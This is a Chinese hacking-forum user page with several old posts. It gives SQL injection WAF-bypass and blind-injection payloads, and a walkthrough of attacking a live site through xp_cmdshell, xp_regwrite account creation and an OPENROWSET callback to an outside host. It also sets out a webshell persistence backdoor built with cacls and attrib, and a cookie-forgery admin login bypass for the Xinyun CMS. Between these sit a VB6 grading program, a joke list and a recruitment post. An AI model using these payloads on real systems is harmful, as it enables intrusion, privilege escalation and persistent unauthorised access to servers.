风〓阿呆 风〓阿呆
关注数: 0 粉丝数: 105 发帖数: 1,556 关注贴吧数: 1
对于 webshell内文件无限恢复的应付方法 情况是这样,webshell(仅仅是webshell)下有个文件无法删除,无法修改,通过attributes 去除属性后再删除,但瞬间“满血满状态,原地复活了“ 貌似以前就遇到过这种情况,当初还跟knell讨论过,一致认为是服务器下有个文件 通过 requst 截取某些参数,然后通过Server.CreateObject("Scripting.FileSystemObject") 来创建这个“无法删除的”文件,接着Attributes设置权限,然后通过外部服务器不断的get,post发包,来让这个文件无限的复活- - 对此,我写了个脚本,经测试,完美阻止这种恶心的攻击方式 Poc.1: ____________________________________________________________________________ Function DelAttrib(TheFile) 'thefile为要修改的文件,大家最好自己写个from表单 response.write "Loading...:"&TheFile&" ...<br>" set fs=Server.CreateObject("Scripting.FileSystemObject") IF fs.FileExists("\\.\"&TheFile) then set f=fs.GetFile("\\.\"&TheFile) f.Attributes=0 '设置属性 set f=nothing response.write "Less Success!" '成功后的提示 if Right(TheFile,1)="\" or Right(TheFile,1)="/" or Left(Right(TheFile,4),1)<>"." then Call fs.DeleteFolder(EE,true)'删除文件 response.write "Delete Success!" else IF fs.FileExists("\\.\"&TheFile) then FN=LCase(Mid(TheFile,InStrRev(Replace(TheFile,"\","/"),"/")+1)) if Instr(FN,"com")<1 and Instr(FN,"con")<1 and Instr(FN,"aux")<1 and Instr(FN,"prn")<1 and Instr(FN,"nul")<1 then set f=fs.GetFile("\\.\"&TheFile)‘ f.Attributes=0 set f=nothing end if fs.Deletefile("\\.\"&TheFile) ‘基于windows保留字命名文件的删除模式 response.write "Delete Success" else response.write "Open File Fail!" '错误提示 end if end if else response.write "Open File Fail!" END IF Dim CMDShell,StrExec,ExecName set CMDShell=Server.CreateObject("WScript.Shell") '调用wscript执行Poc.2的bat脚本 StrExec="D:\web\cmd.exe /c"   '这里为自定义的cmd文件 ExecName="D:\web\jfcx\include\a.bat" '这里为上传到服务器的bat脚本 CMDShell.exec(StrExec&" "&ExecName).stdout.readall set fs=nothing End Function _____________________________________________________________________________ Poc.2: ———————————————————————————————————————————— copy d:\web\a.asp \\.\d:\web\b.asp&&attrib \\.\d:\web\b.asp +a +r +s +h&&cacls \\.\d:\web\b.asp /e /d IUSR_WSPC-HVJ5FRCT79&&cacls \\.\d:\web\b.asp /e /g IUSR_WSPC-HVJ5FRCT79:r&&cacls \\.\d:\web\b.asp /e /d users&&cacls \\.\d:\web\b.asp /e /g users:r&&cacls \\.\d:\web\b.asp /e /d system&&cacls \\.\d:\web\b.asp /e /d administrators 此处脚本存为bat,d:\web\a.asp 是自己创建的文件路径 d:\web\b.asp 是自动恢复的文件路径 ,各服务器iis用户组有所不同,请自行修改 ————————————————————————————————————————————
sql新型注入&绕过方式 原文 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhi.baidu.com%2Fwtvv%2Fblog%2Fitem%2F5c12e4cda8c62e5d0eb34520.html&urlrefer=88fee6a94ce1126bdddbe96fca0aa617 自sql注入发展至今,许多安全文章似乎扭曲了不少人的注射思维,传统的检测注射方法是通过: and 1=1 , and 1=2 来判断真假从而判断是否过滤完全,当然,也有 or 1=2,or 1=1,或者 在数值注射 例如:id=1+1 或id=2-1,等等 本文的目的不是评判谁的检测方法实用,只是向大家推荐一些新的注射方式,可能早有人提及了:) 注:主要针对php下的mysql注射,可借鉴,就不一一介绍了 首先说判断: Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null 或: and 2<=3 其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is null,is not null,<>等 都可用于判断 接着说注入 对于注射取值,我们熟悉的就是union select 和 blind sqlinjection(盲注) 先说Union Select 对于常规的注射,我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4 Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 够恶心吧?可绕过国内所有防注射哦:) 这代码运行后效果如上,至于原理我希望大家自己去查查相关资料,有异议的可给我留言 当然,在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx ,我们可这么做: id=1+union/*&name=*/select+1,2 代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2 这是一种让常量(变量)失效的技巧,当然,环境要求比较苛刻 :) 下面说说Blind SqlIjection(盲注): 一般方式,我想大家应该是这么做的: ascii(substring(password,1,1))=56,或者是     ord(mid(password,1,1))=56 在此,我推荐大家还是用子查询,当然,前提是猜出表,字段,可更为准确的得到想得到的数据 此前,仍然向大家推荐一些新型的手法: find_in_set 例: find_in_set('56',ascii(substr(password,1,1)))=1 strcmp 例: strcmp(left('password',1), 0x56) = 1 将这些函数套如子查询就是:     id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x55)=1 false id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x56)=0    true id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x57)=-1   false 不明白原理的请查阅函数手册或给我留言
SA下的艰苦渗透! 好久没写渗透文章了,今天无聊随便写点,看得懂的来一起讨论讨论```` 应客户要求!对一站点进行渗透测试 www.xxx.com (原地址隐藏) 不废话,直接进主题``` 站点套用的.net 脚本! 服务器为Windows 2003 iis 6.0 google site: www.xxx.com inurl:aspx 发现注射点~ articleinfosSubject.aspx?ID=609 啊D检测!发现信息显示数据库为ACC 我笑 ~ 这么个大的站点 还是.net 用的acc? 丢NBSI里,返回信息为SA 登陆用户为SA 见鬼,同样的注射不同的结果,后来才看到,原来关闭了错误回显``` 直接提交 and (SElect count(*) from sysobjects)>0-- 正常 and (SElect count(*) from msysobjects)>0-- 异常 这里 对SQL注射熟悉的人 可以看出我的注射语句有点不正常,这个稍后说明 说明是SQL数据库咯,看下权限~ ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- 正常, 看来是SA咯! 可惜关闭了错误提示,只能手工了,不过可是SA哦~ 继续提交;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- 很好,问题来了! hackers : Please do not try to inject attack site, the site has implemented safety control, lawless elements will crack down! Keep your system has been operational records law: IP operation:58.54.XXX.XXX Time:2008-03-31 16:02:35 Page:http://www.XXX.com/articleinfosSubject.aspx?ID=609;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- Sumbit Type:GET Parameters:ID Data:609;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- 被LOG记录了,记录得很详细嘛,可是,是哪过滤了呢? 试着提交了其他的注射语句,同样的被记录了! 直到提交 EXEC master.dbo.xp_cmdshell 'net user guest /active:yes'-- OK,终于返回错误信息了,汗 看来过滤了大小写!(这也就是上面我判断数据库时为什么要用SElect了) 不过,问题解决了,新问题又来了,xp_cmdshell 无法执行,被禁了? 提交 ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE-- 很好,返回正常,看来恢复成功了``` 接着试着 执行 EXEC master.dbo.xp_cmdshell 'net user guest /active:yes'-- 仍然报错,看来真是RP问题了! 试了oacreate 也是报错 继续提交: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','C:\windows\system32\cmd.exe /c net user wooden 123123 /add' 返回正常, 还好,还有xp_regwrite 可以用,继续提交 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','C:\windows\system32\cmd.exe /c net localgroup administrators wooden /add' OK,成功在RUN里写了个提权帐号 既然regwrite 可以用,那么试下开启sandboxmode EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0-- OK 成功执行,接着 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','Select shell("net user wooden 123123 /add")'); 报错,看来是没戏了,不过,还好顺利执行了xp_regwrite 接着就是判断WEB与DATA是否分离了! 本地监听了个端口 接着在注射点上执行 select * from OPENROWSET('SQLOLEDB', 'uid=hook;pwd=hook;Network=DBMSSOCN;Address=121.XX.XX.XX,XX。;', 'select * from xx') 顺利的地到了DATA IP 到此,检测已经完成``` 其实这次入侵的确花了好多心思的,我只是把入侵过程缩减了很多。。。 服务器其实还过滤了单引号,不过通过   declare @a sysname   select @a=   exec master.dbo.xp_cmdshell @a 变量声明后 顺利的执行了语句!
由继承权限联想到的Backdoor 昨天在扫描的时候,为了不让卡巴把我的hack包给Del了,直接把hack文件夹的权限给禁了... 今天在解压个文件的时候,竟然拒绝访问,这才想起到昨天禁用权限的时候这个文件继承了昨天的设置...不禁联想到,是否能依靠继承权限来留个backdoor呢? 我们都知道,在Windows默认的设置中,子目录是继承了父目录的权限的,不仅在磁盘,在各个领域中,几乎都是默认的,简单的说,Webshell就是继承了IIS,而IIS又是继承了System... 那么,我们是否可以利用管理员的这种心理,来给我们留个后门呢?当然,系统后门估计是不行,那我们就留个Webshell's door 吧 假设,我现在已经取得了一台服务器的控制权,我在他的web深目录下建个adai文件夹,然后在里面写个个一句话木马,OK```接着,我们回到web目录所继承权限的磁盘目录,把原有控制磁盘权限的帐户全部del,然后重新建立原有的帐户,并为他们分配好原有的权限,这样,子文件及文件夹失去了对父文件的继承了... 接着我们在DOS下回到web深目录,执行: Cacls adai /t /e /c /g administrator Cacls adai /t /e /c /g guest Cacls adai /t /e /c /g system 这样,是把此文件夹已经继承此文件夹下的子文件及子文件夹的系统帐号权限删除... 接着运行attrib +r +s +h adai 这样是否更加完美了? 这只是个初期想法,比较适合菜鸟网管吧... By:阿呆
前段时间写的学生数据库管理系统 编译环境:VB6.0 只发代码,控件就不发了:登陆框:Private Sub Command1_Click()Dim a As StringDim b As Stringa = Text1.Textb = Text2.TextIf a = "adai" And b = "123" Thenj = MsgBox("欢迎您登陆!但您不能查看您的信息和成绩!", , "同学")管理.ShowUnload Mebuttons FalseElseIf Combo1.Text = "老师" And a = "laoshi" And b = "123" Theni = MsgBox("欢迎您登陆!您可以修改任何成绩和信息!", , "老师")管理.ShowUnload Mebuttons TrueElse: q = MsgBox("帐号或密码错误,请重新输入!", , "错误")Text1.Text = ""Text2.Text = ""Text1.SetFocusCombo1.Text = ""End IfEnd SubPrivate Sub buttons(val As Boolean)管理.cjgl.Enabled = valEnd Sub成绩管理框:先用”菜单编辑器”制作如下菜单重新登陆 学生信息查看通用 成绩管理 帮助 (关于) 退出 学生成绩查看分别为他们赋予名称:ty(dl)(tc),cjgl(xxck)(cjck),bz(gy)相关代码如下:Private Sub cjck_Click()成绩浏览.ShowEnd SubPrivate Sub dl_Click()Dim a As Integera = MsgBox("确定要重新登陆么?", 1 + 32, "提示")If a = 1 ThenUnload Me登陆.ShowEnd IfEnd SubPrivate Sub gy_Click()关于.ShowEnd SubPrivate Sub MDIForm_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd SubPrivate Sub tc_Click()Dim a As Integera = MsgBox("确定要退出么?", 1 + 32, "提示")If a = 1 ThenUnload MeEnd IfEnd SubPrivate Sub xxck_Click()信息浏览.ShowEnd Sub版权框:控件名属性参数frame1caption帮助信息backcolor&H00C0E0FF&Label1backcolor&H00C0E0FF&caption学生数据库管理系统 测试版 V1.0font楷体Label2backcolor&H00C0E0FF&captionPower By 阿呆Label3backcolor&H00C0E0FF&caption此程序可实现数据库系统的管理,和安装调试,由于制作的比较匆忙,程序本身肯定是不够完善的,如发现bug,请及时通知作者,欢迎您使用本软件,谢谢!!Image1PictureCommand1caption退出相关代码:Private Sub Command1_Click()Unload MeEnd SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub信息浏览:首先创建一个数据库(cjgl),为其建立两个表:xsxx和xscj。Xsxx包含字段名:学号,姓名,性别,班级,生日,地址Xscj包含字段名:学号,姓名,班级,语文,数学,英语,专业在控件Ado中设计其属性,使其指定数据库cjgk的xsxx表,相关控件如下Adodc1RecordSourcexsxxDataGrid1allowdelecttrueallowaddnewtruedataSourceAdodc1代码如下:Private Sub Adodc1_WillMove(ByVal adReason As ADODB.EventReasonEnum, adStatus As ADODB.EventStatusEnum, ByVal pRecordset As ADODB.Recordset)End SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub成绩浏览在控件Ado中设计其属性,使其指定数据库cjgk的xscj表,相关控件如下:Command1caption添加Command2caption删除Command3caption保存Command4Caption退出DataGrid1dataSourceAdodc1代码如下:Private Sub Command1_Click()Adodc1.Recordset.AddNewEnd SubPrivate Sub Command2_Click()Adodc1.Recordset.DeleteEnd SubPrivate Sub Command3_Click()Adodc1.Recordset.SaveEnd SubPrivate Sub Command4_Click()Unload MeEnd SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub感觉效果还不是很好,有空改进下~~嘿嘿..
转篇以前写的文章,新云小漏洞! 最近玩新云时,在COOKIE欺骗的时候,经常会遇到已经有管理员在线,不允许多用户同时登陆,导致进不了后台,拿不了webshell,很是郁闷,下了新云的源码回来看了下。在admin_login.asp文件里发现了个小问题,一起来看看(由于小弟ASP算不上入门,仅简单分析下,出错了别拿番茄炸我): Sub logout() '清除COOKIES中管理员身份的验证信息. Session.Abandon Session("AdminName") = "" Session("AdminPass") = "" Session("AdminGrade") = "" Session("AdminFlag") = "" Session("AdminStatus") = "" Session("AdminID") = "" Session("AdminRandomCode") = "" Response.Cookies(Admin_Cookies_Name) = "" Response.Redirect ("../") End Sub 这里可以到,我们COOKIE提交的时候主要是提交AdminName,AdminPass,AdminGrade,AdminFlag,AdminStatus,AdminID,AdminRandomCode这几个参数,RandomCode是随机码,也就是登陆时验证管理员是否在线的参数。 Sub chklogin() Dim adminname, password,RandomCode adminname = Trim(Replace(Request("adminname"), "'", "")) password = md5(Trim(Replace(Request("password"), "'", ""))) If Newasp.CheckPost = False Then ErrMsg = ErrMsg + "您提交的数据不合法,请不要从外部提交登陆。" Founderr = True End If If Newasp.IsValidStr(Request("adminname")) = False Then ErrMsg = ErrMsg + "" Founderr = True End If If Newasp.IsValidPassword(Request("password")) = False Then ErrMsg = ErrMsg + "" Founderr = True End If If Request("verifycode") = "" Then ErrMsg = ErrMsg + " " + "" Founderr = True ElseIf Session("getcode") = "9999" Then Session("getcode") = "" ErrMsg = ErrMsg + " " + "" Founderr = True ElseIf CStr(Session("getcode"))<>CStr(Trim(Request("verifycode"))) Then ErrMsg = ErrMsg + " " + "" Founderr = True End If Session("getcode") = "" If adminname = "" Or password = "" Then Founderr = True ErrMsg = ErrMsg + " " + "" Exit Sub End If If Founderr = True Then Exit Sub If Not IsObject(Conn) Then ConnectionDatabase Set Rs = Server.CreateObject("ADODB.Recordset") SQL = "select * from NC_Admin where password='" & password & "' And username='" & adminname & "'" Rs.Open SQL, Conn, 1, 3 If Rs.BOF And Rs.EOF Then FoundErr = True ErrMsg = ErrMsg + "" Exit Sub Else If password <> Rs("password") Then FoundErr = True ErrMsg = ErrMsg + " " Exit Sub End If If Rs("isLock") <> 0 Or Rs("isLock") = "" Then Founderr = True ErrMsg = "" Exit Sub End If End If 这里定义了三个变量adminname, password,RandomCode 可以看到,从事件开始到结束都没有对RandomCode变量进行判断。 接着看到: RandomCode = Newasp.GetRandomCode Rs("LoginTime") = Now() Rs("Loginip") = Newasp.GetUserip 可以看到RandomCode变量是直接从数据库中提取赋值的。 也就是说,RandomCode存在于数据库中,并且程序对这个变量(随即码)没有进行任何判断。 实际运用: 我们在制造注入猜解的时候,在猜字段username,password,id时可以加猜一个RandomCode字段进行猜解,然后在提交的COOKIE中找到RandomCode把我们猜解出来的数据替换原来的 例: ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=(这里填写RandomCode值)&AdminName=admin 这样在提交时 不论管理员是否在线都可以直接登陆后台。
让管理员头疼的ID (爆笑) 转载 1.取名“不认识” 举报人:“管理员,我举报” 管理员:“谁?” 举报人:“不认识” 管理员:“……滚……” 2.取名“请等等” 举报人:“管理员,我举报” 管理员:“谁?” 举报人:“请等等” 管理员:“好的,快点!” 一分钟后…… 管理员:“到底是谁?” 举报人:“请等等啊!!!” 管理员:“等你个头啊,滚…… ”    3.取名:“就是我” 举报人:“我举报!!!” 管理员:“谁?” 举报人:“就是我” 管理员:“很好,成全你……封!” 举报人:“……救命啊……”    4.取名:“骗你的” 举报人:“管理员 我举报” 管理员:“又举报?谁?” 举报人:“骗你的” 管理员:“吃饱了没事干回家喝奶去,滚!”    5.取名“嘿嘿嘿嘿” 举报人:“管理员,有人用外挂,我举报” 管理员:“好的,是谁?” 举报人:“嘿嘿嘿嘿” 管理员:“……请问是谁?” 举报人:“嘿嘿嘿嘿” 管理员:“来人啊,拨打神经病医院电话……”    6.取名“我是你爸” 举报人:“管理员,有人用外挂” 管理员:“谁?” 举报人:“我是你爸” 管理员:“我是你爷爷!”    7.取名“不是我” 举报人:“我举报,有人用外挂” 管理员:“……,谁?” 举报人:“不是我” 管理员:“???那是谁?” 举报人:“就不是我” 管理员:“你TM废话,不是你是谁?” 举报人:举报人:“真的,不是我呀” 管理员:“滚……”    8.取名“管理员啊” 举报人:“管理员哥哥,有人用外挂,我举报” 管理员:“好的,是谁?” 举报人:是“管理员啊” 管理员:“谁?你说谁?” 举报人:“管理员啊”   管理员:“……,我有必要用外挂吗?灭了你!……。”    9.取名:“本人已死” 举报人:“管理员,有人外挂,我举报” 管理员:“****小子我被玩了一天了, 敢报假案的话,俺宰了你,快说是谁?” 举报人:“本人已死” 管理员:“你……,死了闹什么闹,活了再来找我。”    10.取名:打死我也不说 举报人:“管理员 我举报” 管理员:“又举报?谁?” 举报人:“打死我也不说” 管理员:“……!吃饱了没事干,滚……!”
黑客吧内高手请进! 要求技术: 1.LAN组建:涉及到硬件(网线的制作,各客户机兼容配置==),路由,阔扑结构,交换机,集线器,基本故障处理. 2.系统:linux就不说了.了解windows:DOS,注册表,系统安装,优化.BIOS 3.程序语言:ASP,SQL,C,JAVE,C++,VB,ACCESS,JSP...(不要求精通,能大概了解,要求了解3门以上语言包括以上其中1门). 4.黑客技术:站点的入侵,提权, Sniff,端口漏洞,WINDOWS漏洞,批处理,免杀,溢出,代理(跳板),扫描. 说了那么多,该进正题了. 大家都知道,目前黑客吧已经不成样子了,广大网友都希望黑客吧能回复当日的雄风.但,要管理好黑客吧,就必须要有绝对的技术支持.最起码要回答得起人家的问题.吧里的流量是比较大的.问问题的人也是很多的.但计算机的问题是什么都有.吧主的能力是有限的,这就需要强大的技术支持.也许上面所涉及到的算不上什么高深的技术.但如果要全部了解或许没多少人能做到,最起码我不能~ >_<... 为了能解决广大网友提出的问题,也为了能更好的管理起帖吧,在此,黑客吧特邀请有技术的朋友加入管理组.只要能了解以上4门技术中的任意一门请留下您的QQ,但我要先声明: 1.你是真的希望黑客吧能像个黑客吧,肯帮这个忙的. 2.本次邀请的人没有任何的回报,回报您的,只有广大网友的:谢谢! 3 既然肯帮忙,就希望您能尽心尽力.为黑客吧出份力.如果你真的希望黑客吧能好起来,请支持吧!
1 下一页